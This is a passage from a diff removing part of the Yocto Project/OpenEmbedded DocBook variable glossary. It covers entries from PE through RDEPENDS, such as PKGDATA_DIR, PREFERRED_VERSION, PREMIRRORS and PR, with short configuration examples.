- versioning scheme changes in some backwards incompatible
- way.
- </para>
-
- <para>
- <filename>PE</filename> is the default value of the
- <link linkend='var-PKGE'><filename>PKGE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PF'><glossterm>PF</glossterm>
- <info>
- PF[doc] = "Specifies the recipe or package name and includes all version and revision numbers. This variable is comprised of ${PN}-${EXTENDPE}${PV}-${PR}."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the recipe or package name and includes all version and revision
- numbers (i.e. <filename>glibc-2.13-r20+svnr15508/</filename> and
- <filename>bash-4.2-r1/</filename>).
- This variable is comprised of the following:
- <literallayout class='monospaced'>
- ${<link linkend='var-PN'>PN</link>}-${<link linkend='var-EXTENDPE'>EXTENDPE</link>}${<link linkend='var-PV'>PV</link>}-${<link linkend='var-PR'>PR</link>}
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PIXBUF_PACKAGES'><glossterm>PIXBUF_PACKAGES</glossterm>
- <info>
- PIXBUF_PACKAGES[doc] = "When a recipe inherits the pixbufcache class, this variable identifies packages that contain the pixbuf loaders used with gdk-pixbuf."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-pixbufcache'><filename>pixbufcache</filename></link>
- class, this variable identifies packages that contain
- the pixbuf loaders used with
- <filename>gdk-pixbuf</filename>.
- By default, the <filename>pixbufcache</filename> class
- assumes that the loaders are in the recipe's main package
- (i.e. <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
- Use this variable if the loaders you need are in a package
- other than that main package.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKG'><glossterm>PKG</glossterm>
- <info>
- PKG[doc] = "The name of the resulting package created by the OpenEmbedded build system. When you use this variable, you must use a package name override."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The name of the resulting package created by the
- OpenEmbedded build system.
- <note>
- When using the <filename>PKG</filename> variable, you
- must use a package name override.
- </note>
- </para>
-
- <para>
- For example, when the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class renames the output package, it does so by setting
- <filename>PKG_<replaceable>packagename</replaceable></filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKG_CONFIG_PATH'><glossterm>PKG_CONFIG_PATH</glossterm>
- <info>
- PKG_CONFIG_PATH[doc] = "Path to pkg-config files for the current build context."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The path to <filename>pkg-config</filename> files for the
- current build context.
- <filename>pkg-config</filename> reads this variable
- from the environment.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGD'><glossterm>PKGD</glossterm>
- <info>
- PKGD[doc] = "Points to the destination directory for files to be packaged before they are split into individual packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the destination directory for files to be
- packaged before they are split into individual packages.
- This directory defaults to the following:
- <literallayout class='monospaced'>
- ${WORKDIR}/package
- </literallayout>
- </para>
-
- <para>
- Do not change this default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGDATA_DIR'><glossterm>PKGDATA_DIR</glossterm>
- <info>
- PKGDATA_DIR[doc] = "Points to a shared, global-state directory that holds data generated during the packaging process."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to a shared, global-state directory that holds data
- generated during the packaging process.
- During the packaging process, the
- <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
- task packages data for each recipe and installs it into
- this temporary, shared area.
- This directory defaults to the following, which you should
- not change:
- <literallayout class='monospaced'>
- ${STAGING_DIR_HOST}/pkgdata
- </literallayout>
- For examples of how this data is used, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and Concepts Manual
- and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#viewing-package-information-with-oe-pkgdata-util'>Viewing Package Information with <filename>oe-pkgdata-util</filename></ulink>"
- section in the Yocto Project Development Tasks Manual.
- For more information on the shared, global-state directory,
- see
- <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGDEST'><glossterm>PKGDEST</glossterm>
- <info>
- PKGDEST[doc] = "Points to the parent directory for files to be packaged after they have been split into individual packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the parent directory for files to be packaged
- after they have been split into individual packages.
- This directory defaults to the following:
- <literallayout class='monospaced'>
- ${WORKDIR}/packages-split
- </literallayout>
- </para>
-
- <para>
- Under this directory, the build system creates
- directories for each package specified in
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>.
- Do not change this default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGDESTWORK'><glossterm>PKGDESTWORK</glossterm>
- <info>
- PKGDESTWORK[doc] = "Points to a temporary work area where the do_package task saves package metadata."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to a temporary work area where the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task saves package metadata.
- The <filename>PKGDESTWORK</filename> location defaults to
- the following:
- <literallayout class='monospaced'>
- ${WORKDIR}/pkgdata
- </literallayout>
- Do not change this default.
- </para>
-
- <para>
- The
- <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
- task copies the package metadata from
- <filename>PKGDESTWORK</filename> to
- <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
- to make it available globally.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGE'><glossterm>PKGE</glossterm>
- <info>
- PKGE[doc] = "The epoch of the package(s) built by the recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The epoch of the package(s) built by the recipe.
- By default, <filename>PKGE</filename> is set to
- <link linkend='var-PE'><filename>PE</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGR'><glossterm>PKGR</glossterm>
- <info>
- PKGR[doc] = "The revision of the package(s) built by the recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The revision of the package(s) built by the recipe.
- By default, <filename>PKGR</filename> is set to
- <link linkend='var-PR'><filename>PR</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PKGV'><glossterm>PKGV</glossterm>
- <info>
- PKGV[doc] = "The version of the package(s) built by the recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The version of the package(s) built by the
- recipe.
- By default, <filename>PKGV</filename> is set to
- <link linkend='var-PV'><filename>PV</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PN'><glossterm>PN</glossterm>
- <info>
- PN[doc] = "PN refers to a recipe name in the context of a file used by the OpenEmbedded build system as input to create a package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable can have two separate functions depending on the context: a recipe
- name or a resulting package name.
- </para>
-
- <para>
- <filename>PN</filename> refers to a recipe name in the context of a file used
- by the OpenEmbedded build system as input to create a package.
- The name is normally extracted from the recipe file name.
- For example, if the recipe is named
- <filename>expat_2.0.1.bb</filename>, then the default value of <filename>PN</filename>
- will be "expat".
- </para>
-
- <para>
- The variable refers to a package name in the context of a file created or produced by the
- OpenEmbedded build system.
- </para>
-
- <para>
- If applicable, the <filename>PN</filename> variable also contains any special
- suffix or prefix.
- For example, using <filename>bash</filename> to build packages for the native
- machine, <filename>PN</filename> is <filename>bash-native</filename>.
- Using <filename>bash</filename> to build packages for the target and for Multilib,
- <filename>PN</filename> would be <filename>bash</filename> and
- <filename>lib64-bash</filename>, respectively.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PNBLACKLIST'><glossterm>PNBLACKLIST</glossterm>
- <info>
- PNBLACKLIST[doc] = "Lists recipes you do not want the OpenEmbedded build system to build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists recipes you do not want the OpenEmbedded build system
- to build.
- This variable works in conjunction with the
- <link linkend='ref-classes-blacklist'><filename>blacklist</filename></link>
- class, which is inherited globally.
- </para>
-
- <para>
- To prevent a recipe from being built, use the
- <filename>PNBLACKLIST</filename> variable in your
- <filename>local.conf</filename> file.
- Here is an example that prevents
- <filename>myrecipe</filename> from being built:
- <literallayout class='monospaced'>
- PNBLACKLIST[myrecipe] = "Not supported by our organization."
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-POPULATE_SDK_POST_HOST_COMMAND'><glossterm>POPULATE_SDK_POST_HOST_COMMAND</glossterm>
- <info>
- POPULATE_SDK_POST_HOST_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created host part of the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call once the
- OpenEmbedded build system has created the host part of
- the SDK.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- POPULATE_SDK_POST_HOST_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the SDK path to a command
- within a function, you can use
- <filename>${SDK_DIR}</filename>, which points to
- the parent directory used by the OpenEmbedded build
- system when creating SDK output.
- See the
- <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-POPULATE_SDK_POST_TARGET_COMMAND'><glossterm>POPULATE_SDK_POST_TARGET_COMMAND</glossterm>
- <info>
- POPULATE_SDK_POST_TARGET_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created target part of the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call once the
- OpenEmbedded build system has created the target part of
- the SDK.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- POPULATE_SDK_POST_TARGET_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the SDK path to a command
- within a function, you can use
- <filename>${SDK_DIR}</filename>, which points to
- the parent directory used by the OpenEmbedded build
- system when creating SDK output.
- See the
- <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PR'><glossterm>PR</glossterm>
- <info>
- PR[doc] = "The revision of the recipe. The default value for this variable is 'r0'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The revision of the recipe. The default value for this
- variable is "r0".
- Subsequent revisions of the recipe conventionally have the
- values "r1", "r2", and so forth.
- When
- <link linkend='var-PV'><filename>PV</filename></link>
- increases, <filename>PR</filename> is conventionally reset
- to "r0".
- <note>
- The OpenEmbedded build system does not need the aid of
- <filename>PR</filename> to know when to rebuild a
- recipe.
- The build system uses the task
- <ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>input checksums</ulink>
- along with the
- <link linkend='structure-build-tmp-stamps'>stamp</link>
- and
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state cache</ulink>
- mechanisms.
- </note>
- The <filename>PR</filename> variable primarily becomes
- significant when a package manager dynamically installs
- packages on an already built image.
- In this case, <filename>PR</filename>, which is the default
- value of
- <link linkend='var-PKGR'><filename>PKGR</filename></link>,
- helps the package manager distinguish which package is the
- most recent one in cases where many packages have the same
- <filename>PV</filename> (i.e. <filename>PKGV</filename>).
- A component having many packages with the same
- <filename>PV</filename> usually means that the packages all
- install the same upstream version, but with later
- (<filename>PR</filename>) version packages including
- packaging fixes.
- <note>
- <filename>PR</filename> does not need to be increased
- for changes that do not change the package contents or
- metadata.
- </note>
- Because manually managing <filename>PR</filename> can be
- cumbersome and error-prone, an automated solution exists.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>Working With a PR Service</ulink>"
- section in the Yocto Project Development Tasks Manual
- for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PREFERRED_PROVIDER'><glossterm>PREFERRED_PROVIDER</glossterm>
- <info>
- PREFERRED_PROVIDER[doc] = "If multiple recipes provide an item, this variable determines which recipe should be given preference."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If multiple recipes provide the same item, this variable
- determines which recipe is preferred and thus provides
- the item (i.e. the preferred provider).
- You should always suffix this variable with the name of the
- provided item.
- And, you should define the variable using the preferred
- recipe's name
- (<link linkend='var-PN'><filename>PN</filename></link>).
- Here is a common example:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
- </literallayout>
- In the previous example, multiple recipes are providing
- "virtual/kernel".
- The <filename>PREFERRED_PROVIDER</filename> variable is
- set with the name (<filename>PN</filename>) of the recipe
- you prefer to provide "virtual/kernel".
- </para>
-
- <para>
- Following are more examples:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
- PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
- </literallayout>
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#metadata-virtual-providers'>Using Virtual Providers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- <note>
- If you use a <filename>virtual/*</filename> item
- with <filename>PREFERRED_PROVIDER</filename>, then any
- recipe that
- <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
- that item but is not selected (defined) by
- <filename>PREFERRED_PROVIDER</filename> is prevented
- from building, which is usually desirable since this
- mechanism is designed to select between mutually
- exclusive alternative providers.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PREFERRED_VERSION'><glossterm>PREFERRED_VERSION</glossterm>
- <info>
- PREFERRED_VERSION[doc] = "If there are multiple versions of recipes available, this variable determines which recipe should be given preference."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If multiple versions of recipes exist, this
- variable determines which version is given preference.
- You must always suffix the variable with the
- <link linkend='var-PN'><filename>PN</filename></link>
- you want to select, and you should set the
- <link linkend='var-PV'><filename>PV</filename></link>
- accordingly for precedence.
- </para>
-
- <para>
- The <filename>PREFERRED_VERSION</filename> variable
- supports limited wildcard use through the
- "<filename>%</filename>" character.
- You can use the character to match any number of
- characters, which can be useful when specifying versions
- that contain long revision numbers that potentially change.
- Here are two examples:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_python = "3.4.0"
- PREFERRED_VERSION_linux-yocto = "5.0%"
- </literallayout>
- <note><title>Important</title>
- The use of the "<filename>%</filename>" character
- is limited in that it only works at the end of the
- string.
- You cannot use the wildcard character in any other
- location of the string.
- </note>
- </para>
-
- <para>
- The specified version is matched against
- <link linkend='var-PV'><filename>PV</filename></link>,
- which does not necessarily match the version part of
- the recipe's filename.
- For example, consider two recipes
- <filename>foo_1.2.bb</filename> and
- <filename>foo_git.bb</filename> where
- <filename>foo_git.bb</filename> contains the following
- assignment:
- <literallayout class='monospaced'>
- PV = "1.1+git${SRCPV}"
- </literallayout>
- In this case, the correct way to select
- <filename>foo_git.bb</filename> is by using an
- assignment such as the following:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_foo = "1.1+git%"
- </literallayout>
- Compare that previous example against the following
- incorrect example, which does not work:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_foo = "git"
- </literallayout>
- </para>
-
- <para>
- Sometimes the <filename>PREFERRED_VERSION</filename>
- variable can be set by configuration files in a way that
- is hard to change.
- You can use
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
- to set a machine-specific override.
- Here is an example:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_linux-yocto_qemux86 = "5.0%"
- </literallayout>
- Although not recommended, worst case, you can also use the
- "forcevariable" override, which is the strongest override
- possible.
- Here is an example:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_linux-yocto_forcevariable = "5.0%"
- </literallayout>
- <note>
- The <filename>_forcevariable</filename> override is
- not handled specially.
- This override only works because the default value of
- <filename>OVERRIDES</filename> includes
- "forcevariable".
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PREMIRRORS'><glossterm>PREMIRRORS</glossterm>
- <info>
- PREMIRRORS[doc] = "Specifies additional paths from which the OpenEmbedded build system gets source code."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies additional paths from which the OpenEmbedded
- build system gets source code.
- When the build system searches for source code, it first
- tries the local download directory.
- If that location fails, the build system tries locations
- defined by <filename>PREMIRRORS</filename>, the upstream
- source, and then locations specified by
- <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
- in that order.
- </para>
-
- <para>
- Assuming your distribution
- (<link linkend='var-DISTRO'><filename>DISTRO</filename></link>)
- is "poky", the default value for
- <filename>PREMIRRORS</filename> is defined in the
- <filename>conf/distro/poky.conf</filename> file in the
- <filename>meta-poky</filename> Git repository.
- </para>
-
- <para>
- Typically, you could add a specific server for the
- build system to attempt before any others by adding
- something like the following to the
- <filename>local.conf</filename> configuration file in the
- <link linkend='build-directory'>Build Directory</link>:
- <literallayout class='monospaced'>
- PREMIRRORS_prepend = "\
- git://.*/.* http://www.yoctoproject.org/sources/ \n \
- ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
- http://.*/.* http://www.yoctoproject.org/sources/ \n \
- https://.*/.* http://www.yoctoproject.org/sources/ \n"
- </literallayout>
- These changes cause the build system to intercept
- Git, FTP, HTTP, and HTTPS requests and direct them to
- the <filename>http://</filename> sources mirror.
- You can use <filename>file://</filename> URLs to point
- to local directories or network shares as well.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PRIORITY'><glossterm>PRIORITY</glossterm>
- <info>
- PRIORITY[doc] = "Indicates the importance of a package. The default value is 'optional'. Other standard values are 'required', 'standard', and 'extra'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Indicates the importance of a package.
- </para>
-
- <para>
- <filename>PRIORITY</filename> is considered to be part of
- the distribution policy because the importance of any given
- recipe depends on the purpose for which the distribution
- is being produced.
- Thus, <filename>PRIORITY</filename> is not normally set
- within recipes.
- </para>
-
- <para>
- You can set <filename>PRIORITY</filename> to "required",
- "standard", "extra", and "optional", which is the default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PRIVATE_LIBS'><glossterm>PRIVATE_LIBS</glossterm>
- <info>
- PRIVATE_LIBS[doc] = "Specifies libraries installed within a recipe that should be ignored by the OpenEmbedded build system's shared library resolver."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies libraries installed within a recipe that
- should be ignored by the OpenEmbedded build system's
- shared library resolver.
- This variable is typically used when software being
- built by a recipe has its own private versions of a
- library normally provided by another recipe.
- In this case, you would not want the package containing
- the private libraries to be set as a dependency on other
- unrelated packages that should instead depend on the
- package providing the standard version of the library.
- </para>
-
- <para>
- Libraries specified in this variable should be specified
- by their file name.
- For example, from the Firefox recipe in meta-browser:
- <literallayout class='monospaced'>
- PRIVATE_LIBS = "libmozjs.so \
- libxpcom.so \
- libnspr4.so \
- libxul.so \
- libmozalloc.so \
- libplc4.so \
- libplds4.so"
- </literallayout>
- </para>
-
- <para>
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PROVIDES'><glossterm>PROVIDES</glossterm>
- <info>
- PROVIDES[doc] = "A list of aliases that a recipe also provides. These aliases are useful for satisfying dependencies of other recipes during the build as specified by DEPENDS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of aliases by which a particular recipe can be
- known.
- By default, a recipe's own
- <filename><link linkend='var-PN'>PN</link></filename>
- is implicitly already in its <filename>PROVIDES</filename>
- list and therefore does not need to mention that it provides itself.
- If a recipe uses <filename>PROVIDES</filename>, the
- additional aliases are synonyms for the recipe and can
- be useful for satisfying dependencies of other recipes during
- the build as specified by
- <filename><link linkend='var-DEPENDS'>DEPENDS</link></filename>.
- </para>
-
- <para>
- Consider the following example
- <filename>PROVIDES</filename> statement from the recipe
- file <filename>eudev_3.2.9.bb</filename>:
- <literallayout class='monospaced'>
- PROVIDES = "udev"
- </literallayout>
- The <filename>PROVIDES</filename> statement results in
- the "eudev" recipe also being available as simply "udev".
-
- <note>
- Given that a recipe's own recipe name is already
- implicitly in its own <filename>PROVIDES</filename> list,
- it is unnecessary to add aliases with the "+=" operator;
- using a simple assignment will be sufficient. In other
- words, while you could write:
- <literallayout class='monospaced'>
- PROVIDES += "udev"
- </literallayout>
- in the above, the "+=" is overkill and unnecessary.
- </note>
- </para>
-
- <para>
- In addition to providing recipes under alternate names,
- the <filename>PROVIDES</filename> mechanism is also used
- to implement virtual targets.
- A virtual target is a name that corresponds to some
- particular functionality (e.g. a Linux kernel).
- Recipes that provide the functionality in question list the
- virtual target in <filename>PROVIDES</filename>.
- Recipes that depend on the functionality in question can
- include the virtual target in <filename>DEPENDS</filename>
- to leave the choice of provider open.
- </para>
-
- <para>
- Conventionally, virtual targets have names on the form
- "virtual/function" (e.g. "virtual/kernel").
- The slash is simply part of the name and has no
- syntactical significance.
- </para>
-
- <para>
- The
- <link linkend='var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>
- variable is used to select which particular recipe
- provides a virtual target.
- <note>
- <para>A corresponding mechanism for virtual runtime
- dependencies (packages) exists.
- However, the mechanism does not depend on any special
- functionality beyond ordinary variable assignments.
- For example,
- <filename>VIRTUAL-RUNTIME_dev_manager</filename>
- refers to the package of the component that manages
- the <filename>/dev</filename> directory.</para>
-
- <para>Setting the "preferred provider" for runtime
- dependencies is as simple as using the following
- assignment in a configuration file:</para>
- <literallayout class='monospaced'>
- VIRTUAL-RUNTIME_dev_manager = "udev"
- </literallayout>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PRSERV_HOST'><glossterm>PRSERV_HOST</glossterm>
- <info>
- PRSERV_HOST[doc] = "The network based PR service host and port."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The network based
- <link linkend='var-PR'><filename>PR</filename></link>
- service host and port.
- </para>
-
- <para>
- The <filename>conf/local.conf.sample.extended</filename>
- configuration file in the
- <link linkend='source-directory'>Source Directory</link>
- shows how the <filename>PRSERV_HOST</filename> variable is
- set:
- <literallayout class='monospaced'>
- PRSERV_HOST = "localhost:0"
- </literallayout>
- You must set the variable if you want to automatically
- start a local
- <ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>PR service</ulink>.
- You can set <filename>PRSERV_HOST</filename> to other
- values to use a remote PR service.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PTEST_ENABLED'><glossterm>PTEST_ENABLED</glossterm>
- <info>
- PRSERV_HOST[doc] = "Specifies whether or not Package Test (ptest) functionality is enabled when building a recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies whether or not
- <ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Package Test</ulink>
- (ptest) functionality is enabled when building a recipe.
- You should not set this variable directly.
- Enabling and disabling building Package Tests
- at build time should be done by adding "ptest" to (or
- removing it from)
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PV'><glossterm>PV</glossterm>
- <info>
- PV[doc] = "The version of the recipe. The version is normally extracted from the recipe filename."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The version of the recipe.
- The version is normally extracted from the recipe filename.
- For example, if the recipe is named
- <filename>expat_2.0.1.bb</filename>, then the default value
- of <filename>PV</filename> will be "2.0.1".
- <filename>PV</filename> is generally not overridden within
- a recipe unless it is building an unstable (i.e.
- development) version from a source code repository
- (e.g. Git or Subversion).
- </para>
-
- <para>
- <filename>PV</filename> is the default value of the
- <link linkend='var-PKGV'><filename>PKGV</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PYTHON_ABI'><glossterm>PYTHON_ABI</glossterm>
- <info>
- PYTHON_ABI[doc] = "When used by recipes that inherit the distutils3, setuptools3, distutils, or setuptools classes, denotes the Application Binary Interface (ABI) currently in use for Python."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used by recipes that inherit the
- <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>,
- <link linkend='ref-classes-setuptools3'><filename>setuptools3</filename></link>,
- <link linkend='ref-classes-distutils'><filename>distutils</filename></link>,
- or
- <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
- classes, denotes the Application Binary Interface (ABI)
- currently in use for Python.
- By default, the ABI is "m".
- You do not have to set this variable as the OpenEmbedded
- build system sets it for you.
- </para>
-
- <para>
- The OpenEmbedded build system uses the ABI to construct
- directory names used when installing the Python headers
- and libraries in sysroot
- (e.g. <filename>.../python3.3m/...</filename>).
- </para>
-
- <para>
- Recipes that inherit the <filename>distutils</filename>
- class during cross-builds also use this variable to
- locate the headers and libraries of the appropriate Python
- that the extension is targeting.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PYTHON_PN'><glossterm>PYTHON_PN</glossterm>
- <info>
- PYTHON_PN[doc] = "When used by recipes that inherit the distutils3, setuptools3, distutils, or setuptools classes, specifies the major Python version being built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used by recipes that inherit the
- <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>,
- <link linkend='ref-classes-setuptools3'><filename>setuptools3</filename></link>,
- <link linkend='ref-classes-distutils'><filename>distutils</filename></link>,
- or
- <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
- classes, specifies the major Python version being built.
- For Python 3.x, <filename>PYTHON_PN</filename> would be
- "python3".
- You do not have to set this variable as the
- OpenEmbedded build system automatically sets it for you.
- </para>
-
- <para>
- The variable allows recipes to use common infrastructure
- such as the following:
- <literallayout class='monospaced'>
- DEPENDS += "${PYTHON_PN}-native"
- </literallayout>
- In the previous example, the version of the dependency
- is <filename>PYTHON_PN</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-r'><title>R</title>
-
- <glossentry id='var-RANLIB'><glossterm>RANLIB</glossterm>
- <info>
- RANLIB[doc] = "Minimal command and arguments to run 'ranlib'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run
- <filename>ranlib</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RCONFLICTS'><glossterm>RCONFLICTS</glossterm>
- <info>
- RCONFLICTS[doc] = "The list of packages that conflict with another package. Note that the package will not be installed if the conflicting packages are not first removed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of packages that conflict with packages.
- Note that packages will not be installed if conflicting
- packages are not first removed.
- </para>
-
- <para>
- Like all package-controlling variables, you must always use
- them in conjunction with a package name override.
- Here is an example:
- <literallayout class='monospaced'>
- RCONFLICTS_${PN} = "<replaceable>another_conflicting_package_name</replaceable>"
- </literallayout>
- </para>
-
- <para>
- BitBake, which the OpenEmbedded build system uses, supports
- specifying versioned dependencies.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RCONFLICTS</filename> variable:
- <literallayout class='monospaced'>
- RCONFLICTS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <filename>operator</filename>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For example, the following sets up a dependency on version
- 1.2 or greater of the package <filename>foo</filename>:
- <literallayout class='monospaced'>
- RCONFLICTS_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RDEPENDS'><glossterm>RDEPENDS</glossterm>
- <info>
- RDEPENDS[doc] = "Lists runtime dependencies of a package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists runtime dependencies of a package.
- These dependencies are other packages that must be
- installed in order for the package to function correctly.
- As an example, the following assignment declares that the
- package <filename>foo</filename> needs the packages
- <filename>bar</filename> and <filename>baz</filename> to
- be installed:
- <literallayout class='monospaced'>
- RDEPENDS_foo = "bar baz"
- </literallayout>
- The most common types of package runtime dependencies are
- automatically detected and added.
- Therefore, most recipes do not need to set
- <filename>RDEPENDS</filename>.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <para>
- The practical effect of the above
- <filename>RDEPENDS</filename> assignment is that
- <filename>bar</filename> and <filename>baz</filename>
- will be declared as dependencies inside the package
- <filename>foo</filename> when it is written out by one of
- the
- <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>
- tasks.
- Exactly how this is done depends on which package format
- is used, which is determined by
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>.
- When the corresponding package manager installs the
- package, it will know to also install the packages on
- which it depends.
- </para>
-
- <para>
- To ensure that the packages <filename>bar</filename> and
- <filename>baz</filename> get built, the previous
- <filename>RDEPENDS</filename> assignment also causes a task
- dependency to be added.
- This dependency is from the recipe's
- <link linkend='ref-tasks-build'><filename>do_build</filename></link>
- (not to be confused with
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>)
- task to the <filename>do_package_write_*</filename>
- task of the recipes that build <filename>bar</filename> and
- <filename>baz</filename>.
- </para>
-
- <para>
- The names of the packages you list within
- <filename>RDEPENDS</filename> must be the names of other
- packages - they cannot be recipe names.
- Although package names and recipe names usually match,
- the important point here is that you are
- providing package names within the
- <filename>RDEPENDS</filename> variable.
- For an example of the default list of packages created from
- a recipe, see the
